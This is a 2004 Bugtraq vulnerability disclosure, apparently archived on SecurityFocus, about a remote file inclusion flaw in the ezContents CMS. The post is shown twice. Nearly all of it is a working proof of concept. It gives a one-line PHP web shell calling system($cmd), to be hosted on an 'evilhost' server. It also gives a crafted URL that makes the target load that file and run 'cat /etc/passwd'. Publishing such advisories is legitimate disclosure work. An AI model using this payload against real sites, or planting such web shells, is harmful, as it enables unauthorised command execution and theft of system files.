Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Remote Code Execution in ezContents
Jan 10 2004 05:13PM
Zero_X www.lobnan.de Team (zero-x linuxmail org)
Remote Code Execution in ezContents
"ezContents" from www.ezcontents.org allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Remote Code Execution in ezContents
"ezContents" from www.ezcontents.org allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
[ reply ]